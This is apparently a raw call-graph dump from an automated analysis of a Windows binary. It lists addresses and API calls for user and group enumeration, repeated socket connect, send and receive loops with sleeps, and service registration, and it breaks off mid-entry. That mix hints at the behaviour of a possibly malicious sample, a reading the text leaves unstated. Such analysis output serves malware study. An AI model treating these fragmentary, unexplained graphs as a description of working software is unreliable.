7ff8b9152edf 8 API calls 61542->61584 61544 7ff8b91535d6 61548 7ff8b9151292 6 API calls 61544->61548 61562 7ff8b91535df 61544->61562 61545 7ff8b91534d0 NetLocalGroupEnum 61546 7ff8b9152fd4 61545->61546 61546->61544 61546->61545 61549 7ff8b9153546 GetProcessHeap HeapAlloc 61546->61549 61551 7ff8b91534ad NetApiBufferFree 61546->61551 61547 7ff8b9153729 61552 7ff8b9151292 6 API calls 61547->61552 61548->61562 61553 7ff8b9153579 61549->61553 61554 7ff8b9152fe3 61549->61554 61551->61546 61556 7ff8b9153609 61552->61556 61557 7ff8b91535b4 61553->61557 61558 7ff8b9153585 memcpy GetProcessHeap HeapFree 61553->61558 61554->61546 61560 7ff8b9151292 6 API calls 61554->61560 61555 7ff8b91535ec 61559 7ff8b9151292 6 API calls 61555->61559 61556->61540 61557->61540 61558->61557 61559->61556 61560->61554 61561 7ff8b91535e7 61585 7ff8b9152edf 8 API calls 61561->61585 61562->61547 61562->61561 61564 7ff8b915379f 8 API calls 61563->61564 61569 7ff8b9153894 61564->61569 61565 7ff8b9153ed7 61568 7ff8b9151292 6 API calls 61565->61568 61583 7ff8b9153ee0 61565->61583 61566 7ff8b9153dba NetUserEnum 61566->61569 61567 7ff8b9154014 61570 7ff8b9151292 6 API calls 61567->61570 61568->61583 61569->61565 61569->61566 61571 7ff8b9153d97 NetApiBufferFree 61569->61571 61573 7ff8b9153e36 GetProcessHeap HeapAlloc 61569->61573 61574 7ff8b9153f0a 61570->61574 61571->61569 61572 7ff8b915379f 8 API calls 61575 7ff8b9153eed 61572->61575 61576 7ff8b9153e70 61573->61576 61577 7ff8b91538a3 61573->61577 61574->61539 61575->61574 61580 7ff8b9151292 6 API calls 61575->61580 61581 7ff8b9153e7c memcpy GetProcessHeap HeapFree 61576->61581 61582 7ff8b9153eb5 61576->61582 61577->61569 61578 7ff8b9151292 6 API calls 61577->61578 61578->61577 61579 7ff8b9153ee8 61579->61572 61580->61574 61581->61582 61582->61539 61583->61567 61583->61579 61584->61546 61585->61555 61586 7ff8bfb5364a 61592 7ff8bfb53655 61586->61592 61587 7ff8bfb5375e 61588 7ff8bfb5376b 61587->61588 61645 7ff8bfb52415 10 API calls 61587->61645 61590 7ff8bfb5367d Sleep 61590->61592 61592->61587 61592->61590 61593 7ff8bfb52415 10 API calls 61592->61593 61595 7ff8bfb53732 Sleep 61592->61595 61597 7ff8bfb5371e memcpy 61592->61597 61598 7ff8bfb526ac socket 61592->61598 61633 7ff8bfb52b5a 61592->61633 61644 7ff8bfb53580 9 API calls 61592->61644 61593->61592 61595->61592 61597->61592 61599 7ff8bfb528ab WSAGetLastError 61598->61599 61600 7ff8bfb526e3 61598->61600 61603 7ff8bfb52fd2 6 API calls 61599->61603 61601 7ff8bfb52705 61600->61601 61602 7ff8bfb526e7 61600->61602 61606 7ff8bfb52349 8 API calls 61601->61606 61646 7ff8bfb52349 61602->61646 61605 7ff8bfb528cf 61603->61605 61608 7ff8bfb528d9 61605->61608 61609 7ff8bfb5271f 61605->61609 61610 7ff8bfb52703 61606->61610 61613 7ff8bfb52fd2 6 API calls 61608->61613 61611 7ff8bfb52fd2 6 API calls 61609->61611 61614 7ff8bfb52717 61610->61614 61659 7ff8bfb5247a setsockopt 61610->61659 61615 7ff8bfb52740 61611->61615 61612 7ff8bfb5275e 61612->61614 61617 7ff8bfb52763 htonl htons connect 61612->61617 61613->61615 61663 7ff8bfb52415 10 API calls 61614->61663 61615->61592 61620 7ff8bfb527bc WSAGetLastError 61617->61620 61621 7ff8bfb527a1 61617->61621 61623 7ff8bfb527cd 61620->61623 61624 7ff8bfb5287e WSAGetLastError 61620->61624 61622 7ff8bfb52349 8 API calls 61621->61622 61626 7ff8bfb527ae 61622->61626 61623->61614 61627 7ff8bfb527d5 select 61623->61627 61625 7ff8bfb52fd2 6 API calls 61624->61625 61625->61614 61626->61605 61626->61614 61628 7ff8bfb52836 61627->61628 61629 7ff8bfb52860 61627->61629 61628->61621 61631 7ff8bfb5283c WSAGetLastError 61628->61631 61630 7ff8bfb52fd2 6 API calls 61629->61630 61630->61614 61632 7ff8bfb52fd2 6 API calls 61631->61632 61632->61614 61634 7ff8bfb52be8 61633->61634 61635 7ff8bfb52b74 61633->61635 61636 7ff8bfb52fd2 6 API calls 61634->61636 61635->61634 61637 7ff8bfb52b79 recv 61635->61637 61640 7ff8bfb52b93 61636->61640 61638 7ff8bfb52b9c WSAGetLastError 61637->61638 61639 7ff8bfb52b8f 61637->61639 61638->61640 61641 7ff8bfb52bb0 61638->61641 61639->61640 61643 7ff8bfb52fd2 6 API calls 61639->61643 61640->61592 61642 7ff8bfb52fd2 6 API calls 61641->61642 61642->61640 61643->61640 61644->61592 61645->61588 61647 7ff8bfb52359 ioctlsocket 61646->61647 61649 7ff8bfb5238d WSAGetLastError 61647->61649 61651 7ff8bfb5237c 61647->61651 61650 7ff8bfb52fd2 6 API calls 61649->61650 61650->61651 61651->61612 61652 7ff8bfb52294 setsockopt 61651->61652 61653 7ff8bfb522c9 setsockopt 61652->61653 61654 7ff8bfb52324 WSAGetLastError 61652->61654 61655 7ff8bfb522ff WSAGetLastError 61653->61655 61658 7ff8bfb522f5 61653->61658 61656 7ff8bfb52fd2 6 API calls 61654->61656 61657 7ff8bfb52fd2 6 API calls 61655->61657 61656->61658 61657->61658 61658->61610 61660 7ff8bfb524b7 61659->61660 61661 7ff8bfb524c1 WSAGetLastError 61659->61661 61660->61612 61662 7ff8bfb52fd2 6 API calls 61661->61662 61662->61660 61663->61609 61664 7ff8bfb36230 61665 7ff8bfb3625b LeaveCriticalSection 61664->61665 61666 7ff8bfb36238 61664->61666 61674 7ff8bfb361e8 61665->61674 61666->61664 61681 7ff8bfb31cbd 61666->61681 61668 7ff8bfb3626d GetProcessHeap HeapFree 61668->61674 61669 7ff8bfb3634c Sleep SleepEx 61670 7ff8bfb3635c EnterCriticalSection 61669->61670 61672 7ff8bfb36380 61670->61672 61671 7ff8bfb3629b EnterCriticalSection 61673 7ff8bfb362be LeaveCriticalSection 61671->61673 61671->61674 61675 7ff8bfb363b1 LeaveCriticalSection 61672->61675 61676 7ff8bfb36398 GetProcessHeap HeapFree 61672->61676 61673->61674 61674->61668 61674->61669 61674->61670 61674->61671 61674->61673 61677 7ff8bfb362dd 61674->61677 61680 7ff8bfb39a80 GetSystemTimeAsFileTime 61674->61680 61676->61672 61678 7ff8bfb3a202 6 API calls 61677->61678 61679 7ff8bfb3632b EnterCriticalSection 61678->61679 61680->61674 61682 7ff8bfb31ce8 61681->61682 61683 7ff8bfb31d6c 61681->61683 61682->61683 61687 7ff8bfb31ced 61682->61687 61684 7ff8bfb3a202 6 API calls 61683->61684 61689 7ff8bfb31d40 61684->61689 61685 7ff8bfb31cf6 send 61686 7ff8bfb31d1a WSAGetLastError 61685->61686 61685->61687 61690 7ff8bfb3a202 6 API calls 61686->61690 61687->61685 61688 7ff8bfb31d39 61687->61688 61688->61689 61691 7ff8bfb3a202 6 API calls 61688->61691 61689->61666 61690->61688 61691->61689 61692 7ff8b918ef2a 61701 7ff8b918ef35 61692->61701 61693 7ff8b918f03e 61697 7ff8b918f04b 61693->61697 61759 7ff8b9184e55 10 API calls 61693->61759 61696 7ff8b918ef5d Sleep 61696->61701 61699 7ff8b9184e55 10 API calls 61699->61701 61700 7ff8b918f012 Sleep 61700->61701 61701->61693 61701->61696 61701->61699 61701->61700 61703 7ff8b918effe memcpy 61701->61703 61704 7ff8b91850ec socket 61701->61704 61739 7ff8b918559a 61701->61739 61750 7ff8b918ee60 61701->61750 61703->61701 61705 7ff8b91852eb WSAGetLastError 61704->61705 61706 7ff8b9185123 61704->61706 61707 7ff8b9181292 6 API calls 61705->61707 61708 7ff8b9185127 61706->61708 61709 7ff8b9185145 61706->61709 61710 7ff8b918530f 61707->61710 61760 7ff8b9184d89 61708->61760 61711 7ff8b9184d89 8 API calls 61709->61711 61713 7ff8b9185319 61710->61713 61724 7ff8b918515f 61710->61724 61723 7ff8b9185143 61711->61723 61715 7ff8b9181292 6 API calls 61713->61715 61720 7ff8b9185180 61715->61720 61716 7ff8b9181292 6 API calls 61716->61720 61717 7ff8b918519e 61722 7ff8b91851a3 htonl htons connect 61717->61722 61733 7ff8b9185157 61717->61733 61720->61701 61725 7ff8b91851fc WSAGetLastError 61722->61725 61726 7ff8b91851e1 61722->61726 61723->61733 61773 7ff8b9184eba setsockopt 61723->61773 61724->61716 61728 7ff8b91852be WSAGetLastError 61725->61728 61729 7ff8b918520d 61725->61729 61727 7ff8b9184d89 8 API calls 61726->61727 61730 7ff8b91851ee 61727->61730 61732 7ff8b9181292 6 API calls 61728->61732 61731 7ff8b9185215 select 61729->61731 61729->61733 61730->61710 61730->61733 61734 7ff8b9185276 61731->61734 61735 7ff8b91852a0 61731->61735 61732->61733 61777 7ff8b9184e55 10 API calls 61733->61777 61734->61726 61736 7ff8b918527c WSAGetLastError 61734->61736 61737 7ff8b9181292 6 API calls 61735->61737 61738 7ff8b9181292 6 API calls 61736->61738 61737->61733 61738->61733 61740 7ff8b9185628 61739->61740 61741 7ff8b91855b4 61739->61741 61742 7ff8b9181292 6 API calls 61740->61742 61741->61740 61743 7ff8b91855b9 recv 61741->61743 61746 7ff8b91855d3 61742->61746 61744 7ff8b91855cf 61743->61744 61745 7ff8b91855dc WSAGetLastError 61743->61745 61744->61746 61749 7ff8b9181292 6 API calls 61744->61749 61745->61746 61747 7ff8b91855f0 61745->61747 61746->61701 61748 7ff8b9181292 6 API calls 61747->61748 61748->61746 61749->61746 61751 7ff8b918ef22 61750->61751 61752 7ff8b918ee78 61750->61752 61751->61701 61752->61751 61778 7ff8b9187cc0 61752->61778 61755 7ff8b918ef14 LeaveCriticalSection 61755->61751 61756 7ff8b918eea8 61756->61755 61757 7ff8b9181292 6 API calls 61756->61757 61781 7ff8b91900aa 61756->61781 61757->61756 61759->61697 61761 7ff8b9184d99 ioctlsocket 61760->61761 61763 7ff8b9184dcd WSAGetLastError 61761->61763 61764 7ff8b9184dbc 61761->61764 61765 7ff8b9181292 6 API calls 61763->61765 61764->61717 61766 7ff8b9184cd4 setsockopt 61764->61766 61765->61764 61767 7ff8b9184d09 setsockopt 61766->61767 61768 7ff8b9184d64 WSAGetLastError 61766->61768 61769 7ff8b9184d3f WSAGetLastError 61767->61769 61770 7ff8b9184d35 61767->61770 61771 7ff8b9181292 6 API calls 61768->61771 61772 7ff8b9181292 6 API calls 61769->61772 61770->61723 61771->61770 61772->61770 61774 7ff8b9184ef7 61773->61774 61775 7ff8b9184f01 WSAGetLastError 61773->61775 61774->61717 61776 7ff8b9181292 6 API calls 61775->61776 61776->61774 61777->61724 61779 7ff8b9187ccb EnterCriticalSection 61778->61779 61780 7ff8b9187cd6 GetSystemTimeAsFileTime 61778->61780 61779->61756 61780->61779 61782 7ff8b91900da 61781->61782 61798 7ff8b9190102 61781->61798 61783 7ff8b91900e4 61782->61783 61784 7ff8b919014a 61782->61784 61786 7ff8b9190120 61783->61786 61787 7ff8b91900e6 61783->61787 61812 7ff8b918f8ba 91 API calls 61784->61812 61788 7ff8b9190151 61786->61788 61789 7ff8b9190127 61786->61789 61790 7ff8b9190158 61787->61790 61791 7ff8b91900ed 61787->61791 61813 7ff8b918f92f 47 API calls 61788->61813 61794 7ff8b9190143 61789->61794 61799 7ff8b919012e 61789->61799 61814 7ff8b918fa61 24 API calls 61790->61814 61795 7ff8b919010b 61791->61795 61796 7ff8b91900ef 61791->61796 61806 7ff8b918f7c8 61794->61806 61795->61798 61810 7ff8b918fb83 15 API calls 61795->61810 61800 7ff8b91900f6 61796->61800 61801 7ff8b919015f 61796->61801 61798->61756 61799->61798 61811 7ff8b918f7d6 184 API calls 61799->61811 61800->61798 61809 7ff8b918fc03 34 API calls 61800->61809 61815 7ff8b918fb0a 18 API calls 61801->61815 61816 7ff8b918f780 61806->61816 61809->61798 61810->61798 61811->61798 61812->61798 61813->61798 61814->61798 61815->61798 61823 7ff8b918e2fb 61816->61823 61818 7ff8b918f7a1 61818->61798 61822 7ff8b918e2fb 2 API calls 61822->61818 61824 7ff8b918e311 QueryPerformanceFrequency QueryPerformanceCounter 61823->61824 61825 7ff8b918e306 61823->61825 61824->61825 61825->61818 61826 7ff8b9186c3d 61825->61826 61863 7ff8b9186bff 61826->61863 61829 7ff8b9186c53 61829->61822 61830 7ff8b9181770 8 API calls 61831 7ff8b9186c73 61830->61831 61832 7ff8b918e0f1 8 API calls 61831->61832 61833 7ff8b9186c88 61832->61833 61834 7ff8b9186d39 61833->61834 61835 7ff8b9186c92 strlen 61833->61835 61834->61829 61836 7ff8b9186d41 strlen 61834->61836 61837 7ff8b9186caf 61835->61837 61838 7ff8b9186cc8 strlen 61835->61838 61839 7ff8b9186d6e strlen 61836->61839 61840 7ff8b9186d58 61836->61840 61837->61838 61841 7ff8b9186cb4 strlen 61837->61841 61868 7ff8b918d196 10 API calls 61838->61868 61870 7ff8b918d196 10 API calls 61839->61870 61840->61839 61844 7ff8b9186d5d strlen 61840->61844 61841->61838 61843 7ff8b9186d0e 61843->61829 61869 7ff8b918dcc8 8 API calls 61843->61869 61844->61839 61846 7ff8b9186db1 61849 7ff8b9186dbe 61846->61849 61850 7ff8b9186dc7 CompareFileTime 61846->61850 61848 7ff8b9186d37 61848->61834 61849->61829 61851 7ff8b9186ddb 61850->61851 61852 7ff8b9186df7 61850->61852 61851->61849 61871 7ff8b9184988 22 API calls 61851->61871 61873 7ff8b918c6f1 8 API calls 61852->61873 61855 7ff8b9186de4 61856 7ff8b9186de8 61855->61856 61874 7ff8b9184013 7 API calls 61855->61874 61872 7ff8b91849a3 GetProcessHeap HeapFree GetProcessHeap HeapFree LeaveCriticalSection 61856->61872 61859 7ff8b9186e2c 61859->61856 61875 7ff8b9184097 42 API calls 61859->61875 61861 7ff8b9186e41 61861->61856 61876 7ff8b9183c9c 19 API calls 61861->61876 61877 7ff8b9185ac0 61863->61877 61867 7ff8b9186c0c 61867->61829 61867->61830 61868->61843 61869->61848 61870->61846 61871->61855 61872->61849 61873->61851 61874->61859 61875->61861 61876->61856 61878 7ff8b9182472 9 API calls 61877->61878 61879 7ff8b9185b03 61878->61879 61880 7ff8b9185b07 strlen 61879->61880 61883 7ff8b9185b73 61879->61883 61882 7ff8b9185b40 strcmp 61880->61882 61882->61883 61884 7ff8b9185b81 61882->61884 61883->61867 61890 7ff8b918533e 27 API calls 61883->61890 61891 7ff8b918dcc8 8 API calls 61884->61891 61886 7ff8b9185ba7 61886->61883 61887 7ff8b9185bb9 61886->61887 61892 7ff8b918d9e9 8 API calls 61887->61892 61889 7ff8b9185bc3 61889->61883 61890->61867 61891->61886 61892->61889 61893 7ff8bfb89b0a 61902 7ff8bfb89b15 61893->61902 61894 7ff8bfb89c1e 61898 7ff8bfb89c2b 61894->61898 61960 7ff8bfb819a5 61894->61960 61897 7ff8bfb89b3d Sleep 61897->61902 61900 7ff8bfb89bf2 Sleep 61900->61902 61901 7ff8bfb819a5 23 API calls 61901->61902 61902->61894 61902->61897 61902->61900 61902->61901 61904 7ff8bfb89bde memcpy 61902->61904 61905 7ff8bfb81c3c socket 61902->61905 61940 7ff8bfb820ea 61902->61940 61951 7ff8bfb89a40 61902->61951 61904->61902 61906 7ff8bfb81e3b WSAGetLastError 61905->61906 61907 7ff8bfb81c73 61905->61907 61908 7ff8bfb81292 19 API calls 61906->61908 61909 7ff8bfb81c77 61907->61909 61910 7ff8bfb81c95 61907->61910 61911 7ff8bfb81e5f 61908->61911 61969 7ff8bfb818d9 61909->61969 61912 7ff8bfb818d9 21 API calls 61910->61912 61914 7ff8bfb81e69 61911->61914 61927 7ff8bfb81caf 61911->61927 61918 7ff8bfb81c93 61912->61918 61917 7ff8bfb81292 19 API calls 61914->61917 61916 7ff8bfb81cee 61924 7ff8bfb81cf3 htonl htons connect 61916->61924 61934 7ff8bfb81ca7 61916->61934 61921 7ff8bfb81cd0 61917->61921 61918->61934 61982 7ff8bfb81a0a setsockopt 61918->61982 61919 7ff8bfb81292 19 API calls 61919->61921 61921->61902 61922 7ff8bfb819a5 23 API calls 61922->61927 61925 7ff8bfb81d4c WSAGetLastError 61924->61925 61926 7ff8bfb81d31 61924->61926 61929 7ff8bfb81e0e WSAGetLastError 61925->61929 61930 7ff8bfb81d5d 61925->61930 61928 7ff8bfb818d9 21 API calls 61926->61928 61927->61919 61931 7ff8bfb81d3e 61928->61931 61933 7ff8bfb81292 19 API calls 61929->61933 61932 7ff8bfb81d65 select 61930->61932 61930->61934 61931->61911 61931->61934 61935 7ff8bfb81dc6 61932->61935 61936 7ff8bfb81df0 61932->61936 61933->61934 61934->61922 61935->61926 61937 7ff8bfb81dcc WSAGetLastError 61935->61937 61938 7ff8bfb81292 19 API calls 61936->61938 61939 7ff8bfb81292 19 API calls 61937->61939 61938->61934 61939->61934 61941 7ff8bfb82178 61940->61941 61942 7ff8bfb82104 61940->61942 61944 7ff8bfb81292 19 API calls 61941->61944 61942->61941 61943 7ff8bfb82109 recv 61942->61943 61945 7ff8bfb8211f 61943->61945 61946 7ff8bfb8212c WSAGetLastError 61943->61946 61947 7ff8bfb82123 61944->61947 61945->61947 61950 7ff8bfb81292 19 API calls 61945->61950 61946->61947 61948 7ff8bfb82140 61946->61948 61947->61902 61949 7ff8bfb81292 19 API calls 61948->61949 61949->61947 61950->61947 61952 7ff8bfb89b02 61951->61952 61953 7ff8bfb89a58 61951->61953 61952->61902 61953->61952 61986 7ff8bfb82800 61953->61986 61956 7ff8bfb89af4 LeaveCriticalSection 61956->61952 61957 7ff8bfb89a88 61957->61956 61958 7ff8bfb81292 19 API calls 61957->61958 61989 7ff8bfb8330e 61957->61989 61958->61957 61961 7ff8bfb819b9 61960->61961 61962 7ff8bfb819b3 61960->61962 62248 7ff8bfb81942 shutdown 61961->62248 61962->61898 61965 7ff8bfb819e9 WSAGetLastError 61968 7ff8bfb81292 19 API calls 61965->61968 61966 7ff8bfb819d1 61967 7ff8bfb81292 19 API calls 61966->61967 61967->61962 61968->61962 61970 7ff8bfb818e9 ioctlsocket 61969->61970 61972 7ff8bfb8191d WSAGetLastError 61970->61972 61973 7ff8bfb8190c 61970->61973 61974 7ff8bfb81292 19 API calls 61972->61974 61973->61916 61975 7ff8bfb81824 setsockopt 61973->61975 61974->61973 61976 7ff8bfb81859 setsockopt 61975->61976 61977 7ff8bfb818b4 WSAGetLastError 61975->61977 61979 7ff8bfb8188f WSAGetLastError 61976->61979 61980 7ff8bfb81885 61976->61980 61978 7ff8bfb81292 19 API calls 61977->61978 61978->61980 61981 7ff8bfb81292 19 API calls 61979->61981 61980->61918 61981->61980 61983 7ff8bfb81a47 61982->61983 61984 7ff8bfb81a51 WSAGetLastError 61982->61984 61983->61916 61985 7ff8bfb81292 19 API calls 61984->61985 61985->61983 61987 7ff8bfb8280b EnterCriticalSection 61986->61987 61988 7ff8bfb82816 GetSystemTimeAsFileTime 61986->61988 61987->61957 61988->61987 61990 7ff8bfb8339c 61989->61990 61991 7ff8bfb83330 61989->61991 61992 7ff8bfb833b7 61990->61992 61993 7ff8bfb833a6 61990->61993 61997 7ff8bfb83347 61991->61997 62058 7ff8bfb8464b 61991->62058 61995 7ff8bfb8464b 2 API calls 61992->61995 61994 7ff8bfb83392 61993->61994 61999 7ff8bfb82800 GetSystemTimeAsFileTime 61993->61999 61994->61957 61995->61994 61997->61994 62006 7ff8bfb8394a 61997->62006 62007 7ff8bfb83957 GetProcessHeap HeapAlloc 61997->62007 62001 7ff8bfb8348a 61999->62001 62000 7ff8bfb837bb 62002 7ff8bfb8384f 62000->62002 62008 7ff8bfb83800 62000->62008 62003 7ff8bfb84170 21 API calls 62001->62003 62005 7ff8bfb8464b 2 API calls 62002->62005 62004 7ff8bfb83570 62003->62004 62090 7ff8bfb88684 25 API calls 62004->62090 62010 7ff8bfb83859 62005->62010 62006->62007 62011 7ff8bfb8397f memcpy 62007->62011 62012 7ff8bfb839f1 62007->62012 62018 7ff8bfb8386f 62008->62018 62019 7ff8bfb8382a 62008->62019 62061 7ff8bfb82f80 62010->62061 62034 7ff8bfb839bf 62011->62034 62014 7ff8bfb81292 19 API calls 62012->62014 62013 7ff8bfb8358c 62016 7ff8bfb83594 62013->62016 62017 7ff8bfb83701 62013->62017 62020 7ff8bfb836f7 62014->62020 62021 7ff8bfb84170 21 API calls 62016->62021 62097 7ff8bfb85fd5 43 API calls 62017->62097 62067 7ff8bfb8305e 62018->62067 62022 7ff8bfb8387e 62019->62022 62023 7ff8bfb83834 62019->62023 62020->61994 62027 7ff8bfb835a2 62021->62027 62026 7ff8bfb8464b 2 API calls 62022->62026 62028 7ff8bfb8464b 2 API calls 62023->62028 62030 7ff8bfb83888 62026->62030 62091 7ff8bfb88684 25 API calls 62027->62091 62028->61994 62029 7ff8bfb8372e 62029->62016 62030->61994 62035 7ff8bfb82800 GetSystemTimeAsFileTime 62030->62035 62031 7ff8bfb839d5 GetProcessHeap HeapFree 62031->61994 62033 7ff8bfb835be 62036 7ff8bfb8374e 62033->62036 62037 7ff8bfb835c6 62033->62037 62045 7ff8bfb839c7 62034->62045 62100 7ff8bfb832a5 21 API calls 62034->62100 62039 7ff8bfb838e5 62035->62039 62098 7ff8bfb85fd5 43 API calls 62036->62098 62092 7ff8bfb84692 21 API calls 62037->62092 62043 7ff8bfb8464b 2 API calls 62039->62043 62042 7ff8bfb8377b 62042->62037 62046 7ff8bfb838f7 62043->62046 62044 7ff8bfb835d0 62093 7ff8bfb84818 23 API calls 62044->62093 62045->61994 62045->62031 62099 7ff8bfb89c52 26 API calls 62046->62099 62049 7ff8bfb83605 62094 7ff8bfb8ac80 71 API calls 62049->62094 62052 7ff8bfb83671 62053 7ff8bfb83698 62052->62053 62095 7ff8bfb81770 20 API calls 62052->62095 62054 7ff8bfb836c8 62053->62054 62055 7ff8bfb836b1 GetProcessHeap HeapFree 62053->62055 62096 7ff8bfb89c52 26 API calls 62054->62096 62055->62054 62059 7ff8bfb837a5 62058->62059 62060 7ff8bfb84661 QueryPerformanceFrequency QueryPerformanceCounter 62058->62060 62059->61997 62059->62000 62060->62059 62062 7ff8bfb82f90 62061->62062 62066 7ff8bfb82fad 62061->62066 62062->62066 62101 7ff8bfb8959c 62062->62101 62063 7ff8bfb819a5 23 API calls 62064 7ff8bfb82fbe 62063->62064 62064->61994 62066->62063 62066->62064 62068 7ff8bfb83072 62067->62068 62070 7ff8bfb831f6 62067->62070 62068->62070 62072 7ff8bfb83097 62068->62072 62069 7ff8bfb8321e 62071 7ff8bfb8322b 62069->62071 62076 7ff8bfb81c3c 40 API calls 62069->62076 62070->62069 62073 7ff8bfb81c3c 40 API calls 62070->62073 62083 7ff8bfb830d0 62070->62083 62077 7ff8bfb8464b 2 API calls 62071->62077 62071->62083 62074 7ff8bfb830f3 62072->62074 62075 7ff8bfb830a1 62072->62075 62073->62069 62146 7ff8bfb8961b 62074->62146 62079 7ff8bfb8317a 62075->62079 62082 7ff8bfb830ae 62075->62082 62076->62071 62077->62083 62185 7ff8bfb89428 60 API calls 62079->62185 62082->62083 62184 7ff8bfb8991a 80 API calls 62082->62184 62083->61994 62084 7ff8bfb83186 62084->62083 62088 7ff8bfb8464b 2 API calls 62084->62088 62086 7ff8bfb830c8 62086->62083 62089 7ff8bfb8464b 2 API calls 62086->62089 62087 7ff8bfb8464b 2 API calls 62087->62083 62088->62083 62089->62083 62090->62013 62091->62033 62092->62044 62093->62049 62094->62052 62095->62053 62096->62020 62097->62029 62098->62042 62099->61994 62100->62045 62102 7ff8bfb895b8 62101->62102 62103 7ff8bfb895aa 62101->62103 62102->62066 62109 7ff8bfb89570 62103->62109 62108 7ff8bfb819a5 23 API calls 62108->62102 62110 7ff8bfb8957d 62109->62110 62111 7ff8bfb89587 62109->62111 62110->62111 62112 7ff8bfb819a5 23 API calls 62110->62112 62111->62102 62113 7ff8bfb890ca 62111->62113 62112->62111 62115 7ff8bfb890f9 62113->62115 62114 7ff8bfb8ed60 14 API calls 62114->62115 62115->62114 62116 7ff8bfb8915e 62115->62116 62117 7ff8bfb891bb GetProcessHeap HeapAlloc 62115->62117 62118 7ff8bfb8910d GetProcessHeap HeapReAlloc 62115->62118 62119 7ff8bfb81292 19 API calls 62116->62119 62117->62115 62120 7ff8bfb891df 62117->62120 62118->62115 62121 7ff8bfb891f7 62118->62121 62122 7ff8bfb89174 strlen 62119->62122 62123 7ff8bfb81292 19 API calls 62120->62123 62124 7ff8bfb81292 19 API calls 62121->62124 62132 7ff8bfb890b2 62122->62132 62126 7ff8bfb891f5 62123->62126 62127 7ff8bfb8920d 62124->62127 62129 7ff8bfb89229 62126->62129 62127->62129 62130 7ff8bfb89212 GetProcessHeap HeapFree 62127->62130 62129->62108 62130->62129 62131 7ff8bfb8919a GetProcessHeap HeapFree 62131->62129 62135 7ff8bfb8219d 62132->62135 62136 7ff8bfb8224c 62135->62136 62137 7ff8bfb821c8 62135->62137 62138 7ff8bfb81292 19 API calls 62136->62138 62137->62136 62139 7ff8bfb821cd 62137->62139 62145 7ff8bfb82220 62138->62145 62140 7ff8bfb82219 62139->62140 62141 7ff8bfb821d6 send 62139->62141 62144 7ff8bfb81292 19 API calls 62140->62144 62140->62145 62141->62139 62142 7ff8bfb821fa WSAGetLastError 62141->62142 62143 7ff8bfb81292 19 API calls 62142->62143 62143->62140 62144->62145 62145->62129 62145->62131 62147 7ff8bfb89650 62146->62147 62148 7ff8bfb8312f 62146->62148 62149 7ff8bfb896bf 62147->62149 62150 7ff8bfb896ab strlen 62147->62150 62148->62083 62148->62087 62186 7ff8bfb82cb2 62149->62186 62150->62149 62166 7ff8bfb8978d 62150->62166 62154 7ff8bfb8959c 34 API calls 62154->62148 62156 7ff8bfb890ca 30 API calls 62157 7ff8bfb8972e 62156->62157 62157->62166 62195 7ff8bfb89331 62157->62195 62161 7ff8bfb89773 62162 7ff8bfb89777 62161->62162 62203 7ff8bfb88c26 strcmp 62161->62203 62162->62166 62202 7ff8bfb88c8d 6 API calls 62162->62202 62164 7ff8bfb897c5 62165 7ff8bfb897d1 strlen 62164->62165 62164->62166 62165->62166 62168 7ff8bfb897e5 62165->62168 62166->62148 62166->62154 62168->62162 62169 7ff8bfb897f4 strcpy 62168->62169 62204 7ff8bfb88c8d 6 API calls 62169->62204 62171 7ff8bfb89808 62172 7ff8bfb890ca 30 API calls 62171->62172 62173 7ff8bfb89817 62172->62173 62173->62166 62174 7ff8bfb89331 41 API calls 62173->62174 62175 7ff8bfb89827 62174->62175 62175->62166 62205 7ff8bfb88b20 strcmp strcmp strcmp strcmp 62175->62205 62177 7ff8bfb89855 62177->62162 62184->62086 62185->62084 62187 7ff8bfb82d0a 62186->62187 62189 7ff8bfb82cce 62186->62189 62190 7ff8bfb893f4 62187->62190 62189->62187 62208 7ff8bfb82c92 rand_s 62189->62208 62209 7ff8bfb89084 62190->62209 62193 7ff8bfb89419 62193->62156 62193->62166 62235 7ff8bfb8924c 62195->62235 62198 7ff8bfb8934c 62244 7ff8bfb88e50 37 API calls 62198->62244 62200 7ff8bfb89356 62200->62166 62201 7ff8bfb88b20 strcmp strcmp strcmp strcmp 62200->62201 62201->62161 62202->62166 62203->62164 62204->62171 62205->62177 62208->62189 62210 7ff8bfb81c3c 40 API calls 62209->62210 62211 7ff8bfb89091 62210->62211 62212 7ff8bfb8909a 62211->62212 62228 7ff8bfb81a76 setsockopt 62211->62228 62212->62193 62214 7ff8bfb89365 62212->62214 62215 7ff8bfb890ca 30 API calls 62214->62215 62216 7ff8bfb8937a 62215->62216 62217 7ff8bfb893c3 62216->62217 62218 7ff8bfb89331 41 API calls 62216->62218 62220 7ff8bfb819a5 23 API calls 62217->62220 62219 7ff8bfb89386 62218->62219 62232 7ff8bfb88b20 strcmp strcmp strcmp strcmp 62219->62232 62222 7ff8bfb893d0 62220->62222 62224 7ff8bfb893be 62222->62224 62234 7ff8bfb88c8d 6 API calls 62222->62234 62223 7ff8bfb893b2 62223->62217 62225 7ff8bfb893b6 62223->62225 62224->62193 62233 7ff8bfb88c8d 6 API calls 62225->62233 62229 7ff8bfb81ab5 WSAGetLastError 62228->62229 62231 7ff8bfb81aab 62228->62231 62230 7ff8bfb81292 19 API calls 62229->62230 62230->62231 62231->62212 62232->62223 62233->62224 62234->62224 62236 7ff8bfb89274 62235->62236 62238 7ff8bfb8928c 62235->62238 62237 7ff8bfb8927d memset 62236->62237 62236->62238 62239 7ff8bfb89296 62237->62239 62238->62198 62238->62200 62239->62238 62241 7ff8bfb892c4 strchr 62239->62241 62245 7ff8bfb8923e 62239->62245 62241->62239 62242 7ff8bfb892db 62241->62242 62243 7ff8bfb81292 19 API calls 62242->62243 62243->62238 62244->62200 62246 7ff8bfb820ea 21 API calls 62245->62246 62247 7ff8bfb89247 62246->62247 62247->62239 62249 7ff8bfb8195b 62248->62249 62250 7ff8bfb81979 WSAGetLastError 62248->62250 62251 7ff8bfb81292 19 API calls 62249->62251 62252 7ff8bfb81986 62250->62252 62253 7ff8bfb81971 closesocket 62250->62253 62251->62253 62254 7ff8bfb81292 19 API calls 62252->62254 62253->61965 62253->61966 62254->62253 62255 7ff6be038a03 62256 7ff6be03849a 116 API calls 62255->62256 62257 7ff6be038a0d 62256->62257 62258 7ff6be038a72 RegisterServiceCtrlHandlerA 62257->62258 62278 7ff6be038a13 62257->62278 62259 7ff6be038ab3 GetLastError 62258->62259 62260 7ff6be038a92 62258->62260 62264 7ff6be0399e2 6 API calls 62259->62264 62285 7ff6be0381e0 SetServiceStatus 62260->62285 62263 7ff6be038a3a 62288 7ff6be0388ee 10 API calls 62263->62288 62264->62278 62265 7ff6be038ba6 62269 7ff6be0399e2 6 API calls 